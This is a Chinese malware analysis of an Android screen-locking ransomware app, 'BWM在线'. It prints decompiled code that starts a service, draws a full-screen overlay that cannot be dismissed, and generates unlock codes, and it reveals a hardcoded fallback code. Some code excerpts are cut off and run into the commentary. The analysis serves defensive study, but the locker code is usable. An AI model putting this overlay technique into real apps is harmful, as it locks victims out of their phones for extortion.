1.基本信息
病毒名称: a.privacy.fakeccb.a
文件名称: BWM在线
文件MD5: E32377EE18BF0D853D5B45DEDFB6997D
文件包名: com.qqquanquan1031606149
危害属性: 恶意勒索
2.基本行为
程序启动后直接锁屏,以勒索用户
3.详细分析
1、在入口函数内启动服务
try
{
paramView = Class.forName("com.qqquanquan1031606149.s"); //启动服务,文件名为"s"
startService(new Intent(this, paramView));
return;
}
"FLAG_FULLSCREEN"、"FLAG_LAYOUT_IN_SCREEN"配合"SYSTEM_ALERT_WINDOW"权限,使这个悬浮窗全屏置顶且无法清除,造成手机屏幕无法正常使用。
private void createFloatView()
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
getApplication();
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
this.wmParams.type = 2010;
this.wmParams.format = 1;
this.wmParams.flags = 1280; //此处修改为了1280
this.wmParams.gravity = 49;
this.wmParams.x = 0;
this.wmParams.y = 0;
this.wmParams.width = -1;
this.wmParams.height = -1;
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
this.bt = ((Button)this.mFloatLayout.findViewById(2131165190));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131165189));
this.tv = ((TextView)this.mFloatLayout.findViewById(2131165187));
this.bt.setOnClickListener(new View.OnClickListener()3、在处理解除锁屏密码时,作者加入异常处理函数,只有在触发异常后,才能够实现解锁
this.tv.setText("解锁随机码" + this.ppss); //ppss即为解锁码
public void onCreate()
{
LogCatBroadcaster.start(this);
super.onCreate();
this.pass = ((Math.random() * 10000000));
this.passw = ((int)(Math.random() * 1000000));
this.share = getSharedPreferences("QQ1031606149", 0);
this.editor = this.share.edit();
if (isNetworkConnected(getApplicationContext())) //判读是否有网络连接,没有网络连接时,给ppss赋值,即为解锁码
{
if (this.share.getLong("m", 0) == 0)
{
this.editor.putLong("m", this.pass);
this.editor.commit();
}
try
{
this.editor.commit();
label126:
this.ppss = (this.share.getLong("m", 8) + "");
new Thread()
{
public void run() {}
}.start();
return;
}
catch (Exception localException1)
{
break label126;
}
}
try
{
this.ppss = "831524";
}
catch (Exception localException2)
{
for (;;)
{
try
{
this.password = "第六感是我爷爷"; return; }
catch (Exception localException3) {}
localException2 = localException2;
}
}
}
本文分析了一款名为BWM在线的恶意软件,其病毒名为a.privacy.fakeccb.a,该软件通过启动服务并创建不可关闭的全屏悬浮窗口来锁定用户设备,以此进行勒索。文中详细解析了其锁屏机制和技术细节。
1859

被折叠的 条评论
为什么被折叠?



